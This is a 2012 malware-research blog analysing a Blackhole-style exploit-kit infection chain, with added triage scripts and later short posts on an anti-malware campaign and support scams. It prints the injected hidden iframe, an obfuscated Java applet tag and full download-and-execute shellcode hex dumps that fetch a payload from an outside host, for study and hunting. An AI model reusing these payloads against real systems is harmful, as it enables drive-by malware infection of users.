Thursday, August 30, 2012

If you see an infected page with this code:

Don't be surprised that it goes undetected:

This is the orange exploit pack infector HTML analyzed [HERE].

It is an HTML page infected with the orange exploit pack.
I am following the @kafeine report on it.
Source: hxxp://breitlingline.biz/

The infector HTML/iframe:

<iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0></iframe>

VirusTotal detection is very low: 1/41.

Java exploits for CVE-2008-5353 and CVE-2012-0507 were detected at the URL the iframe redirects to, serving a malicious applet like this:

<html><head></head>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>
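The two <param> values in the applet above are its obfuscated arguments: a list of numbers separated by "!". The decoder below is an added example written for this post, not the applet's own WCfn.class code (that class is not reproduced on the page), so the decoding scheme is inferred: a single additive shift of +1 is the only one that turns the start of ur34 into "http://", and infer_shift() recovers it that way rather than hard-coding it. With that shift, ur34 decodes to a URL on the same host and path as the one embedded in the shellcode further down (diesel.thehickorymotormile.com:8382/oshPbY) but with the query expid=12&fid=25, and enm3 decodes to a .exe file name.

```python
"""Decode the '!'-separated numeric <param> values of the malicious applet.

Added example for this post; the decoding routine inside WCfn.class is not on
the page, so the +1 shift is inferred from the known 'http://' prefix.
"""

# The two <param> values exactly as they appear in the applet tag above.
UR34 = "103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"
ENM3 = "69!77!70!117!67!86!77!45!100!119!100"


def decode_param(value, shift=1):
    """Split on '!', add `shift` to each number and map it to a character."""
    return "".join(chr(int(tok) + shift) for tok in value.split("!") if tok)


def infer_shift(value, expected_prefix="http://"):
    """Recover a single additive shift by testing which one yields a known prefix.

    Returns None if no shift works, i.e. the value is not a plain offset
    obfuscation and a different decoder is needed.
    """
    nums = [int(tok) for tok in value.split("!") if tok]
    for shift in range(-255, 256):
        if min(nums) + shift < 0:
            continue  # would not map to a character
        if decode_param(value, shift).startswith(expected_prefix):
            return shift
    return None


def decode_applet_params(ur34=UR34, enm3=ENM3):
    """Decode both parameters with the shift inferred from the URL parameter."""
    shift = infer_shift(ur34)
    if shift is None:
        raise ValueError("parameter is not a simple additive obfuscation")
    return {
        "shift": shift,
        "url": decode_param(ur34, shift),
        "file": decode_param(enm3, shift),
    }


if __name__ == "__main__":
    for key, val in decode_applet_params().items():
        print(f"{key}: {val}")
```

Inferring the shift from a known prefix, rather than assuming it, is the part worth keeping: the same script then works on the next sample from this kit even if the operators change the constant, and fails loudly when they change the scheme.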

which takes you to execution of the shellcode below (two captures; the first ends before the download URL, the second includes it):


4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30
90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff

4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30
20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64
69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72
6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff
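Two things a practitioner wants from these dumps without executing them: the embedded strings (file name, DLL, URL) and the APIs behind the hash constants, which the hunting tips further down describe as kernel32/urlmon calls to download, save and execute the payload. The script below is an added example for this post, not the author's or the kit's code. It runs a strings pass over the tail of the second dump, and reproduces the hash routine visible in both dumps (the loop `ac 03 d0 c1 c2 05 48 79 f7`, i.e. lodsb; add edx,eax; rol edx,5; dec eax; jns). Two assumptions are mine: that the 24 bytes before "cccccc.exe" are six little-endian hash constants, and the list of candidate export names. With that list, five of the six constants resolve, in order, to GetTempPathA, LoadLibraryA, URLDownloadToFileA, WinExec and ExitProcess; the second constant (0x4c58fabd) is reported as unresolved rather than guessed.

```python
"""Triage the shellcode hex dump above: carve strings and resolve API hashes.

Added example for this post. The hash routine mirrors the resolver loop that
appears in both dumps (lodsb / add edx,eax / rol edx,5 / dec eax / jns); the
candidate API names are guesses verified only by hash match.
"""
import re
import struct

# Tail of the second dump, copied from the post: six 32-bit constants followed
# by the local file name, the DLL name and the download URL.
DUMP_TAIL = """
29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a
63 63 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74
74 70 3a 2f 2f 64 69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f
74 6f 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff
"""

# Export names to test against the hash table (guesses, confirmed only by a match).
CANDIDATES = ["GetTempPathA", "GetTickCount", "LoadLibraryA", "URLDownloadToFileA",
              "WinExec", "ExitThread", "ExitProcess"]


def parse_hex_dump(text):
    """Turn a whitespace-separated hex dump into bytes."""
    return bytes(int(tok, 16) for tok in text.split())


def carve_strings(blob, min_len=5):
    """Return runs of printable ASCII of at least min_len bytes (a 'strings' pass)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def rol32(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def api_hash(name):
    """Hash an export name the way the shellcode's resolver loop does.

    The loop only exits after consuming the terminating NUL (dec eax on 0 sets
    the sign flag), so the NUL contributes one extra rotation to the result.
    """
    h = 0
    for c in name.encode("ascii") + b"\x00":
        h = rol32((h + c) & 0xFFFFFFFF, 5)
    return h


def hash_table(blob, count=6):
    """Read the little-endian 32-bit hash constants at the start of the tail."""
    return list(struct.unpack("<%dI" % count, blob[:4 * count]))


def resolve_hashes(hashes, candidates=CANDIDATES):
    """Map each constant to the candidate whose hash matches, else 'unresolved'."""
    by_hash = {api_hash(name): name for name in candidates}
    return {h: by_hash.get(h, "unresolved") for h in hashes}


def triage(text=DUMP_TAIL):
    blob = parse_hex_dump(text)
    return {"strings": carve_strings(blob), "apis": resolve_hashes(hash_table(blob))}


if __name__ == "__main__":
    result = triage()
    for s in result["strings"]:
        print("string:", s)
    for h, name in result["apis"].items():
        print(f"hash 0x{h:08x} -> {name}")
```

The resolved sequence (GetTempPathA, then urlmon.dll via LoadLibraryA, URLDownloadToFileA, WinExec, ExitProcess) together with the strings "cccccc.exe", "urlmon.dll" and the download URL is the whole download-save-execute chain; against a live sample the same api_hash() can be run over a DLL's real export table to resolve the remaining constant instead of guessing names.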

Your PC then downloads the payload from:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

The first and second downloads are the same payload malware:

0318c42a3f.exe (MD5: 059b029e9f645bafde2d603b73221f19)

which drops:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

These binaries create this registry key:

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

and use this value to locate their home directory:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Name: AppData
Data: C:\Documents and Settings\Administrator\Application Data <-- the malware executable's home directory
This is part of an epidemic of Blackhole infection URLs in the wild.
Below are the SHA256 hashes of the dropped malware analyzed so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2
e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206
b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities across the current epidemic:
1. New obfuscation like the one below:

2. Shellcode that resolves kernel32.dll and urlmon.dll APIs to download, save, execute and daemonize the payload trojan, like this:

3. The payload is packed with a new method to avoid packer-database detection.
4. Infected URLs can be grepped with ".php?f=" and ".php?h=" across almost all MDL (Malware Domain List) entries.
5. This is the popular malware downloader used by the current epidemic:

Wednesday, August 29, 2012

I came across this sample today on MDL, analyzed it and wrote a report on VT at the URL below: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is newly injected infection code, kinda long, but Malzilla and jsunpack break it after three loops of tries. It was uploaded to the infected server on Aug 30th 2012 at 11:30. Very new. No wonder VT has a detection ratio of 2/42.

It redirects you to the payload via the Java exploit.

The payload's detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, which is still up/alive.

Or contact me for more details.

#MalwareMustDie!

Just found this anonymous article posted on Pastebin which explains "How to stop Blackhole Exploit Kit by using its vulnerability".

So many Blackhole servers came up to serve malware at the same time. The article explains a weakness in the security configuration of the nginx used by these Blackhole servers: its redirection feature can be abused to create a loop and DoS the service.

Tuesday, August 28, 2012

We had a very positive response from researchers after launching the #MalwareMustDie Twitter forum. Thanks to the reverser and analyst friends who spontaneously joined and actively got involved, and to those who monitored the stream. It was the busiest six hours of my life.

From the outside you may see things like this:
Like you can see in the widget on the right panel of this blog...

In reality the admin panel went crazy, as in these snips:
which were rolling fast with mentions and follows. Boy, we're onto something!

It is a good start indeed; let's make a go of it. A good six hours of first response!!
Thank you guys, you're all great, and let's stay in touch, because I am compiling some honeypot reports for tomorrow and trying to build cases. Without leads we will work fast like today, cracking and yelling crazily in chaos.

That's the spirit, boys! And we really think #MalwareMUSTdie!!

Friday, August 24, 2012

I am happy to report that Ammyy, the remote-access software firm, is now warning about the ongoing telephony scams.

When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that